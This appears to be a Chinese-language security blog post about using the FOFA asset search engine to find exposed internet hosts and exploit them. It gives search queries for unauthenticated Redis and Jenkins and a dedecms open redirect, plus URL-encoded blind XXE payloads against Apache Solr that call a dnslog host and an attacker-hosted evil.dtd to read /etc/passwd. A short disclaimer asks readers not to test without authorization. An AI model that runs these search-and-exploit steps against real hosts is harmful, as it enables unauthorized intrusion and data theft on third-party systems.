FOFA是一款非常強大的搜索引擎
關于對于fofa的描述是:FOFA(網絡空間資產檢索系統)是世界上數據覆蓋更完整的IT設備搜索引擎,擁有全球聯網IT設備更全的DNA信息。
探索全球互聯網的資產信息,進行資產及漏洞影響范圍分析、應用分布統計、應用流行度態勢感知等。
相對于shodan來說fofa的優點就是更加本土化,擁有更多的域名數據,建立了全球最大的資產規則集,而且現在已經更新了識別蜜罐的功能。
fofa的功能這么強大,那我們要怎么利用好提供的功能來挖洞呢?
fofa官方提供了一些基本語法:

而真正高效的用法就是靈活使用邏輯運算符,fofa可以使用高級搜索:括號 和 && || !=等符號進行指紋的組合。
比如我們想搜索開放3389端口并且位于中國的IP,對應的語法就是port="3389" && country=CN
下面就展示一些利用fofa來刷洞的過程。
不過在這之前一定要注意,遵守法律法規,不要作出破壞性的行為,不要做未授權的測試。
不然...嘿嘿嘿、有個地方包吃包住還送白金手鐲。

下面的例子,就是利用fofa來刷洞的例子,少年發揮你的想象力吧。
1、Redis未授權fofa語法搜索:
port="6379"

直接nc 連 6379端口
輸入命令info返回了redis基本信息

2、Jenkins 未授權
fofa語法搜索:
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

在默認情況下Jenkins面板中用戶可以選擇執行腳本界面來操作一些系統層命令。
所以jenkins未授權的危害非常大。
執行一下命令:

3、Apache solr XML 實體注入漏洞
Apache Solr 是一個開源的搜索服務器。
Solr 使用 Java 語言開發,主要基于 HTTP 和 Apache Lucene 實現。
原理大致是文檔通過Http利用XML加到一個搜索集合中。
查詢該集合也是通過 http收到一個XML/JSON響應來實現
fofa語法搜索:
app="Solr" && port="8983"

找到了目標ip進入主界面
可以看到版本小于7.0,所以可能存在xxe

進入搜索框,切換成搜索xxe

BP抓包

構造payload嘗試外帶,外帶地址是dnslog:qmurld.dnslog.cnpayload:
%remote;]> &wt=xml&defType=xmlparser
將payload進行url編碼
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C%21DOCTYPE%20root%20%5B%0A%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A//qmurld.dnslog.cn/%22%3E%0A%25remote%3B%5D%3E%0A%3Croot/%3E&wt=xml&defType=xmlparser

發現外帶成功,所以存在xxe漏洞
因為是Blind xxe,所以在需要在vps服務器上構造惡意的dtd
放在服務器上的evil.dtd
">
BP請求的內容
%ext;%ent;]>&data;
請求的內容也需要進行url編碼
%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f ip:port %2fevil.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E
發現已經成功讀取到/etc/passwd

4、dedecms url跳轉漏洞
先在fofa語法搜索
body="/plus/download.php"


在后面加入鏈接/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D跳轉到百度,
百度url要base64編碼
成功跳轉

更多的姿勢還需要多多發揮想象力,去組合,去找到對應漏洞的特征。
全球網絡安全資訊
安全圈
安全圈
D1Net
中國網絡空間安全協會
安全圈
中國網絡空間安全協會
商密君
安全牛
E安全
安全圈
安全牛